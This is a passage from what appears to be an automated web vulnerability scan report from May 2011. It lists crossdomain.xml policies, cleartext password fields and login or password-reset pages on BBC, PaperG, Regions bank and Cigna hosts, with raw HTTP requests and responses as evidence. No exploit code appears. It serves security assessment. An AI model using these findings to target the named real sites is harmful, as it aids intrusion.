| GET /crossdomain.xml HTTP/1.0 Host: feeds.bbci.co.uk | 
| HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=114 Expires: Mon, 16 May 2011 14:52:32 GMT Date: Mon, 16 May 2011 14:50:38 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline <allow-access-from domain="newsrss.bbc.co.uk" /> <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://newsrss.bbc.co.uk | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: newsrss.bbc.co.uk | 
| HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=120 Expires: Mon, 16 May 2011 14:52:37 GMT Date: Mon, 16 May 2011 14:50:37 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline ...[SNIP]... <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: www.paperg.com | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:36 GMT Server: Apache Last-Modified: Tue, 30 Mar 2010 22:02:28 GMT ETag: "204-4830bc9102500" Accept-Ranges: bytes Cache-Control: max-age=86400 Expires: Tue, 17 May 2011 14:45:36 GMT Content-Type: application/xml Content-Length: 516 Connection: close Via: 1.1 AN-0016020122637050 <?xml version="1.0"?> <!-- http://www.paperg.com <cross-domain-policy> <allow-access-from domain="*.paperg.com"/> <allow-access-from domain="*.paperg.net"/> <allow-access-from domain="*.bostonnow.com"/> <allow-access-from domain="*.thecrimson.com"/> <allow-access-from domain="*.thephoenix.com"/> <allow-access-from domain="*.stuffatnight.com"/> <allow-access-from domain="*.weeklydig.com"/> <allow-access-from domain="*.newhavenindependent.com"/> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 1000 Content-Type: text/xml Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT Accept-Ranges: bytes ETag: "3b38bf3ea0b4ca1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:50 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.luckie.net" /> <allow-access-from domain="luckie.net" /> <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="fdaf.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.regions.com | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: www.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Content-Length: 1000 Content-Type: text/xml Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT Accept-Ranges: bytes ETag: "3b38bf3ea0b4ca1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:51 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.luckie.net" /> <allow-access-from domain="luckie.net" /> <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="fdaf.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://xsinternational | 
| Path: | /crossdomain.xml | 
| GET /crossdomain.xml HTTP/1.0 Host: xsinternational.app6 | 
| HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT Accept-Ranges: bytes ETag: "0e4f34a711c81:101a8" Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET Date: Mon, 16 May 2011 17:08:00 GMT Connection: close Set-Cookie: HUBSPOT39=252777644.0 <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> - <cross-domain-policy> <allow-access-from domain="www.bluemedia.com" secure="true" /> </cross-domain-p ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:10 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <!--Note: formatting/beautifying this code seems to break something. Leave as-is. --> <html> <head> ...[SNIP]... <table class="homeLogIn"> <form name="frmLogin" id="frmLogin" method="post" action="" onSubmit="return submitLogin();"> <input type="hidden" name="TARGET" value=""> ...[SNIP]... <td> <input type="password" maxLength="32" size="22" name="PASSWORD" style="width:125px; height:15px;" class="portal"> </td> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11476 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /company.php | 
| GET /company.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com/ Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:38 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 11250 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /contact.php | 
| GET /contact.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11383 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /join.php | 
| GET /join.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:14:00 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 12598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /press.php | 
| GET /press.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:32 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/flyerboard | 
| GET /publishers/flyerboard Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 14:45:35 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 14896 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/placelocal | 
| GET /publishers/placelocal Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13131 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /support.php | 
| GET /support.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 12289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <fieldset id="fb_login_field"> <form id="form_login" action="" method="post"> <input type="hidden" name="ppg" value="1" /> ...[SNIP]... </label> <input class="text" id="pass" name="pass" type="password" /> <br /> ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/ci/selfsvc | 
| GET /corp/sso/ci/selfsvc Host: cignaforhcp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 302 Found content-language: en-US content-type: text/html date: Mon, 16 May 2011 15:31:34 GMT location: https://cignaforhcp.cigna p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 0 cache-control: no-cache,no-store,max-age expires: Thu, 01 Jan 1970 00:00:00 GMT pragma: No-cache Set-Cookie: JSESSIONID=0000WJAfB Set-Cookie: PD_STATEFUL_335ffd0e-289d Content-Length: 0 | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/ci/selfsvc | 
| GET /corp/sso/ci/selfsvc Host: cignaforhcp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 302 Found content-language: en-US content-type: text/html date: Mon, 16 May 2011 15:31:39 GMT location: https://cignaforhcp.cigna p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 0 cache-control: no-cache,no-store,max-age expires: Thu, 01 Jan 1970 00:00:00 GMT pragma: No-cache Set-Cookie: JSESSIONID=0000-q2wF Set-Cookie: PD_STATEFUL_335ffd0e-289d Content-Length: 0 | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/portal | 
| POST /wps/portal HTTP/1.1 Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna Cache-Control: max-age=0 Origin: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:31:34 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 20913 ibm-web2-location: /wps/portal/!ut/p/c5/04 cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID_CHCP Set-Cookie: PD_STATEFUL_31b6dc34-289d Content-Length: 20575 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang="en" xmlns="http://www.w3.org/ ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Cui-Bytes: 1087 X-TeaLeaf-Page-Cui-Events X-TeaLeaf-Page-Dwell: 5810339 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: BeforeUnload X-TeaLeaf-Page-Url: /web/public/guest Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTUID=6C99367C7FD11 Content-Length: 266 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 17:07:36 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 107 surrogate-control: no-store cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_2af57d96-4b85 Content-Length: 107 ... <html> <body> Response <hr> Read 266 bytes in 1ms. </body> </html> | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotid | 
| GET /web/public/forgotid HTTP/1.1 Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:24 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 18768 ibm-web2-location: /web/public/forgotid/!ut cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6B62B67A7FD11 Set-Cookie: TLTUID=6B62B67A7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_eb751ba4-4b84 Content-Length: 18773 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/forgotpa | 
| GET /web/public/forgotpa Host: my.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:28 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 12125 ibm-web2-location: /web/public/forgotpa cache-control: no-cache pragma: no-cache expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: TLTSID=6DC2518C7FD11 Set-Cookie: TLTUID=6DC2518C7FD11 Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_d1425c42-4b84 Content-Length: 12130 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://securebank | 
| Path: | /ForgottenPassword.aspx | 
| GET /ForgottenPassword.aspx HTTP/1.1 Host: securebank.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 15873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://securebank | 
| Path: | /login.aspx | 
| POST /login.aspx?brand=regions HTTP/1.1 Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 Origin: https://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 110 ignore=&locationZipCode | 
| HTTP/1.1 301 Moved Set-Cookie: securebank.regions.com Date: Mon, 16 May 2011 15:20:12 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: https://securebank Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html Content-Length: 0 | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/professional | 
| GET /corp/sso/professional Host: sso.corp.cigna.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:39 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=741A6F2E7FD11 Set-Cookie: TLTSID=741A6F2E7FD11 Content-language: en Set-cookie: JSESSIONID=0001aplKy Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Password - Enter User Name</title> <link rel="ST ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://www.paperg.com | 
| Path: | /forgot.php | 
| GET /forgot.php HTTP/1.1 Host: www.paperg.com Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:47 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Set-Cookie: PHPSESSID=fq6c4o1f1f Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 3158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://www.planservices | 
| Path: | /regions/ | 
| GET /regions/ HTTP/1.1 Host: www.planservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
